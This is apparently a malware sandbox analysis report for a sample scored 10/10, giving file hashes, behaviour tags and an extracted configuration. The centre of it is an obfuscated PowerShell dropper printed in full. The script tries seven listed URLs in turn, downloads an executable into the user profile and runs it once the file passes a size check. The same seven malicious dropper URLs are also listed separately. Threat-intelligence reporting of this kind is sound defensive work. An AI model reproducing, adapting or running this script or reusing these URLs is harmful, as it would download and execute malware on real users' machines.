General

  • Target

    eed673967d82297ad7d1a265338a70df_JaffaCakes118

  • Size

    130KB

  • Sample

    240921-b5zdbszbpq

  • MD5

    eed673967d82297ad7d1a265338a70df

  • SHA1

    f3405392dcb05947c2f42a281c5d19572d50b1a9

  • SHA256

    d7123a4f3fae3b4fa986bc7419dd59c1da51e971a9f6a007a637a5da03bf8485

  • SHA512

    c4e7020506ff002afceb1b277da790c681036ac60733dc9f0aab9b1f0973caf95e252d66bb7dc050c7625abce9063c6ce8936f43bd273c94532f4406828c2244

  • SSDEEP

    1536:8KSDRD3bNqfNpu39IId5a6XP3Mg8afCqFANmmGdJxnX3:sR1qf69xak3MgxCCammYrnX3

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
$Zi30wqm=('Tz'+('7p'+'d')+'sn');.('n'+'ew'+'-item') $Env:uSERproFIle\j9Myg28\zwvQN08\ -itemtype direcToRy;[Net.ServicePointManager]::"S`E`CUr`ItypRoT`oCol" = (('tl'+'s')+'1'+('2, tls'+'1'+'1')+(', '+'tl')+'s');$Lq4p28v = (('C2'+'z')+('l3h'+'os'));$Fvxhras=(('S'+'pt')+'f'+('wi'+'9'));$Gptvi48=$env:userprofile+(('h'+('bq'+'J')+('9myg2'+'8')+'hb'+('qZ'+'wvqn0')+'8'+('h'+'bq')) -crEplAcE('hb'+'q'),[ChAr]92)+$Lq4p28v+('.e'+'xe');$Y8s7sir=('Y'+('mwj'+'vm4'));$F54aoea=&('n'+'e'+'w-object') net.WebclIENT;$Eybm688=(('http:'+'//'+'h')+('o'+'p'+'eko'+'nnect.com/c')+('gi-'+'b'+'in/'+'v3D')+('D'+'/*h')+('ttp'+':')+('/'+'/c')+('abin'+'e')+('t'+'accura'+'c')+'y'+('.com'+'/wp-inc'+'lu'+'d')+('es'+'/')+'n9'+'0D'+('Bu/*h'+'tt')+'p'+('://ks'+'ulo.c'+'o'+'m/wp-admin/N'+'v')+('ru'+'A')+('/*h'+'ttps'+':/')+('/tra'+'v')+'c'+('all'+'s')+'.c'+('om/blogs/b'+'s'+'lVh')+('/'+'*ht'+'tps:/')+'/'+('raan'+'i'+'va')+('s'+'tra.c'+'o')+('m/wp-co'+'ntent/q/'+'*http:'+'/'+'/2')+'3'+'1b'+'re'+'w'+('in'+'gco')+('.com/'+'w'+'p')+('-in'+'clud'+'es')+('/g'+'w')+'Uy'+('/*'+'htt')+'p'+(':'+'//')+'me'+'a'+('leap'+'ala'+'ce')+('ga'+'te.')+'co'+('m'+'/cg')+('i-b'+'in'+'/G/'))."SPL`iT"([char]42);$Gqo61gj=('J'+('7oc'+'6rs'));foreach($Nzwcje6 in $Eybm688){try{$F54aoea."DoWNLoa`DfI`LE"($Nzwcje6, $Gptvi48);$T14k7wb=(('Co'+'j')+'fo'+'i0');If ((.('Get-'+'I'+'tem') $Gptvi48)."LeN`gtH" -ge 27700) {&('Inv'+'oke-It'+'em')($Gptvi48);$R7g5d84=('V'+'sx'+('6p'+'or'));break;$Ct7ts0x=(('K2'+'l9e')+'kf')}}catch{}}$Zqgwmzy=('Ay'+'ce'+('o'+'fz'))
URLs
exe.dropper

http://hopekonnect.com/cgi-bin/v3DD/

exe.dropper

http://cabinetaccuracy.com/wp-includes/n90DBu/

exe.dropper

http://ksulo.com/wp-admin/NvruA/

exe.dropper

https://travcalls.com/blogs/bslVh/

exe.dropper

https://raanivastra.com/wp-content/q/

exe.dropper

http://231brewingco.com/wp-includes/gwUy/

exe.dropper

http://mealeapalacegate.com/cgi-bin/G/

Targets

    • Target

      eed673967d82297ad7d1a265338a70df_JaffaCakes118

    • Size

      130KB

    • MD5

      eed673967d82297ad7d1a265338a70df

    • SHA1

      f3405392dcb05947c2f42a281c5d19572d50b1a9

    • SHA256

      d7123a4f3fae3b4fa986bc7419dd59c1da51e971a9f6a007a637a5da03bf8485

    • SHA512

      c4e7020506ff002afceb1b277da790c681036ac60733dc9f0aab9b1f0973caf95e252d66bb7dc050c7625abce9063c6ce8936f43bd273c94532f4406828c2244

    • SSDEEP

      1536:8KSDRD3bNqfNpu39IId5a6XP3Mg8afCqFANmmGdJxnX3:sR1qf69xak3MgxCCammYrnX3

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.